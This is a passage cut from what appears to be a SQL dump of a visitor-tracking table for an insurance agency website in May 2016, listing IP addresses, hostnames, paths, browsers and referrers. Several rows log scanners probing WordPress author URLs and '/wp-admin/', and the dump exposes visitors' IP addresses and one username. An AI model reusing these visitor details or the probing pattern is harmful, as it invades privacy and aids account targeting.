11','us','1536 x 864','','','','','','0','0',0),(27369,'0b_f7f3a2fc91fe51f34240f3c6686198e2','1462886123','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(27372,'0b_f7f3a2fc91fe51f34240f3c6686198e2','1462886125','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(27374,'0b_46f001bae65516918c88ac795b92adea','1462887571','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(27377,'0b_05bf9cae2e1aa9cc796759e1e2db6d6d','1462890215','194.28.172.176','s55.org.ua','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'WinXP','Firefox 16','ua','','','','','','','0','0',0),(27380,'0b_7b85482c08df42d6dc14edd6f9b3ff67','1462890481','52.24.134.19','ec2-52-24-134-19.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','','',0,'Win8','Chrome 36','','','','','','','','0','0',0),(27383,'0b_7b85482c08df42d6dc14edd6f9b3ff67','1462890483','52.24.134.19','ec2-52-24-134-19.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','','',0,'Win8','Chrome 36','','','','','','','','0','0',0),(27384,'0b_7b85482c08df42d6dc14edd6f9b3ff67','1462890484','52.24.134.19','ec2-52-24-134-19.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','','',0,'Win8','Chrome 36','','','','','','','','0','0',0),(27387,'0b_7b85482c08df42d6dc14edd6f9b3ff67','1462890487','52.24.134.19','ec2-52-24-134-19.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','','',0,'Win8','Chrome 36','','','','','','','','0','0',0),(27390,'0b_7b85482c08df42d6dc14edd6f9b3ff67','1462890489','52.24.134.19','ec2-52-24-134-19.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','','',0,'Win8','Chrome 36','','','','','','','','0','0',0),(27393,'0b_7b85482c08df42d6dc14edd6f9b3ff67','1462890490','52.24.134.19','ec2-52-24-134-19.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','','',0,'Win8','Chrome 36','','','','','','','','0','0',0),(27396,'0b_5a1fab8e9a36d47f77e398d8bd1b4c3a','1462890506','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(27398,'0b_82e9e77916de71a98766e49777f2b06f','1462890687','24.90.91.19','cpe-24-90-91-19.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','1920 x 1080','Google','','','','','0','0',0),(27401,'0b_82e9e77916de71a98766e49777f2b06f','1462890691','24.90.91.19','cpe-24-90-91-19.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27404,'0b_82e9e77916de71a98766e49777f2b06f','1462890703','24.90.91.19','cpe-24-90-91-19.nyc.res.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','51',0),(27407,'0b_067aecf2382f29a0de6a43f794a3a8d3','1462891152','207.46.13.144','msnbot-207-46-13-144.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27408,'0b_067aecf2382f29a0de6a43f794a3a8d3','1462891167','207.46.13.144','msnbot-207-46-13-144.search.msn.com','/resources.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27411,'0b_942196c02505d91e72e3e3a916a6f590','1462891686','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27413,'0b_4152d36d4c69b958b8a6d57394111e9a','1462892502','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27416,'0b_4152d36d4c69b958b8a6d57394111e9a','1462892504','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27419,'0b_4152d36d4c69b958b8a6d57394111e9a','1462892537','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27420,'0b_4152d36d4c69b958b8a6d57394111e9a','1462892539','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27423,'0b_bce5d5295e08ff34040e7855e1f7d516','1462892974','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(27426,'0b_bce5d5295e08ff34040e7855e1f7d516','1462892976','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(27429,'0b_bce5d5295e08ff34040e7855e1f7d516','1462892978','184.154.139.23','placeholder.sitelock.com','/register/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(27432,'0b_bce5d5295e08ff34040e7855e1f7d516','1462892981','184.154.139.23','placeholder.sitelock.com','/comments/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(27435,'0b_bce5d5295e08ff34040e7855e1f7d516','1462892983','184.154.139.23','placeholder.sitelock.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(27438,'0b_bce5d5295e08ff34040e7855e1f7d516','1462892985','184.154.139.23','placeholder.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(27440,'0b_bce5d5295e08ff34040e7855e1f7d516','1462892989','184.154.139.23','placeholder.sitelock.com','/igo/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(27443,'0b_cd3134b44d7d89249b630e13ff7db2d5','1462893056','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(27446,'0b_30f374643a6e4815302043ce46305780','1462895141','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27449,'0b_06676369af6b21d5d57cbdb84437ba10','1462895580','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','0','0',0),(27452,'0b_06676369af6b21d5d57cbdb84437ba10','1462895581','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','0','0',0),(27453,'0b_06676369af6b21d5d57cbdb84437ba10','1462895591','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/carriers/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','0','0',0),(27455,'0b_06676369af6b21d5d57cbdb84437ba10','1462895611','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win8','Chrome 50','us','1280 x 1024','','','','','','0','51',0),(27456,'0b_b7141ef2160d438fbe422d83d7d60a9c','1462895612','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586','','',0,'Win10','Google Chrome','us','','','','','','','0','0',0),(27459,'0b_b7141ef2160d438fbe422d83d7d60a9c','1462895613','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586','http://www.empireins.com/','',0,'Win10','Google Chrome','us','','','','','','','0','0',0),(27462,'0b_b7141ef2160d438fbe422d83d7d60a9c','1462895633','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586','http://www.empireins.com/','',0,'Win10','Google Chrome','us','','','','','','','0','0',0),(27465,'0b_b7141ef2160d438fbe422d83d7d60a9c','1462895650','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/register/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586','http://www.empireins.com/agent-tools/','',0,'Win10','Google Chrome','us','','','','','','','0','0',0),(27467,'0b_b7141ef2160d438fbe422d83d7d60a9c','1462895661','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586','http://www.empireins.com/register/','',0,'Win10','Google Chrome','us','','','','','','','0','0',0),(27468,'0b_b7141ef2160d438fbe422d83d7d60a9c','1462895693','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586','http://www.empireins.com/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','',0,'Win10','Google Chrome','us','','','','','','','0','0',0),(27470,'0b_da0cceb975e0373808dc24a1472776c6','1462895902','62.210.152.87','62-210-152-87.rev.poneytelecom.eu','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','eu','','','','','','','0','0',0),(27473,'0b_da0cceb975e0373808dc24a1472776c6','1462895902','62.210.152.87','62-210-152-87.rev.poneytelecom.eu','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','eu','','','','','','','0','0',0),(27476,'0b_da0cceb975e0373808dc24a1472776c6','1462895904','62.210.152.87','62-210-152-87.rev.poneytelecom.eu','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','eu','','','','','','','0','0',0),(27477,'0b_45877c980f5fc579ff3a0171984e712a','1462897003','66.249.66.24','crawl-66-249-66-24.googlebot.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27480,'0b_e0f99f614824dbc4ca3cab1964298f28','1462897471','40.77.167.94','msnbot-40-77-167-94.search.msn.com','/carriers','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(27483,'0b_e0f99f614824dbc4ca3cab1964298f28','1462897478','40.77.167.94','msnbot-40-77-167-94.search.msn.com','/carriers/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(27486,'0b_70dd32dbe3dbefc5a959138f1407343a','1462897914','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(27488,'0b_ee628f63efa81f6b78e7686b8bc649d7','1462898450','130.185.155.82','130.185.155.82','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(27489,'0b_ee628f63efa81f6b78e7686b8bc649d7','1462898460','130.185.155.82','130.185.155.82','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(27492,'0b_ee628f63efa81f6b78e7686b8bc649d7','1462898471','130.185.155.82','130.185.155.82','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(27494,'0b_b2695ab141e14537749bd4221a5d452c','1462898614','208.115.111.66','208-115-111-66-reverse.wowrack.com','/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(27495,'0b_9fbe7d83afe82cd86f267476b5f3a5dc','1462899184','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27497,'0b_9fbe7d83afe82cd86f267476b5f3a5dc','1462899186','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27498,'0b_54102bcbfb1d6708a71ff74f664cd1e6','1462899187','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(27501,'0b_54102bcbfb1d6708a71ff74f664cd1e6','1462899188','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(27503,'0b_dedf2af2f87cd22f76a1e0220403d7c2','1462900261','130.185.155.82','130.185.155.82','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(27504,'0b_dedf2af2f87cd22f76a1e0220403d7c2','1462900270','130.185.155.82','130.185.155.82','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(27506,'0b_dedf2af2f87cd22f76a1e0220403d7c2','1462900281','130.185.155.82','130.185.155.82','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(27507,'0b_c6cfa7068b841d33e223d63ca646a479','1462902716','52.88.39.19','ec2-52-88-39-19.us-west-2.compute.amazonaws.com','/','Ruby','','',0,'','','','','','','','','','0','0',0),(27510,'0b_d9f0865446a455d75ba797d9e6465c66','1462903703','66.249.66.8','crawl-66-249-66-8.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27513,'0b_d9f0865446a455d75ba797d9e6465c66','1462903704','66.249.66.8','crawl-66-249-66-8.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27515,'0b_6f716ac21017666e3f118bbda2af6b32','1462904624','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27518,'0b_273f1a48fb0fa46b12a674cf85f664d2','1462905397','198.23.212.88','198-23-212-88-host.colocrossing.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(27519,'0b_80185fe12baf52a1122659991c654103','1462905886','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(27521,'0b_80185fe12baf52a1122659991c654103','1462905888','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(27524,'0b_5584dfda8d5aae8da0d594c7a4eda03e','1462905902','66.249.66.8','crawl-66-249-66-8.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(27525,'0b_5584dfda8d5aae8da0d594c7a4eda03e','1462906162','66.249.66.21','crawl-66-249-66-21.googlebot.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27528,'0b_6d16b726f399299bdf47a007efecfc6c','1462906373','157.55.39.163','msnbot-157-55-39-163.search.msn.com','/under.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27530,'0b_80185fe12baf52a1122659991c654103','1462906582','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(27531,'0b_80185fe12baf52a1122659991c654103','1462906583','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(27534,'0b_8869451b678f34a4be06b846d0d3a2af','1462906640','12.104.103.6','remotepan.pennmutual.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwi5iazvl9DMAhWLFj4KHYCgCLEQFggdMAA&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&bvm=bv.121421273,d.cWw','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(27537,'0b_8869451b678f34a4be06b846d0d3a2af','1462906644','12.104.103.6','remotepan.pennmutual.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(27540,'0b_8869451b678f34a4be06b846d0d3a2af','1462906669','12.104.103.6','remotepan.pennmutual.com','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(27543,'0b_8869451b678f34a4be06b846d0d3a2af','1462906676','12.104.103.6','remotepan.pennmutual.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','51',0),(27546,'0b_8869451b678f34a4be06b846d0d3a2af','1462906677','12.104.103.6','remotepan.pennmutual.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(27549,'0b_58fbc1161a8e3d79230cf28d2513701c','1462906669','50.108.153.152','50.108.153.152','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','0',0),(27552,'0b_8869451b678f34a4be06b846d0d3a2af','1462906683','12.104.103.6','remotepan.pennmutual.com','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','51',0),(27555,'0b_58fbc1161a8e3d79230cf28d2513701c','1462906680','50.108.153.152','50.108.153.152','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','0',0),(27557,'0b_58fbc1161a8e3d79230cf28d2513701c','1462906692','50.108.153.152','50.108.153.152','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','0',0),(27560,'0b_58fbc1161a8e3d79230cf28d2513701c','1462906710','50.108.153.152','50.108.153.152','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','51',0),(27561,'0b_cf4dddf548ba06c772c68d6505244fae','1462907129','66.249.66.34','crawl-66-249-66-34.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27564,'0b_87343014d4ccc558a5d2ecbf7cf5098f','1462909105','180.76.15.34','baiduspider-180-76-15-34.crawl.baidu.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(27567,'0b_941b4edaf94d97cb9c58c722e310009f','1462909567','72.26.247.66','72.26.247.66','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(27569,'0b_8b02e7dae976d9696f0888d76da43d3b','1462909591','101.50.1.116','qspacepm.com','/?author=0','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(27572,'0b_8b02e7dae976d9696f0888d76da43d3b','1462909595','101.50.1.116','qspacepm.com','/?author=1','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(27573,'0b_941b4edaf94d97cb9c58c722e310009f','1462909594','72.26.247.66','72.26.247.66','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(27575,'0b_7cca99ca180bf0ad005360a24f8213f0','1462910597','72.26.247.66','72.26.247.66','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27576,'0b_7cca99ca180bf0ad005360a24f8213f0','1462910597','72.26.247.66','72.26.247.66','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27579,'0b_2a44a9ae389010768510e76e457ae865','1462911666','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27581,'0b_c4bf3c081030ac8dc6051acf223c56a4','1462913399','74.65.218.246','cpe-74-65-218-246.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 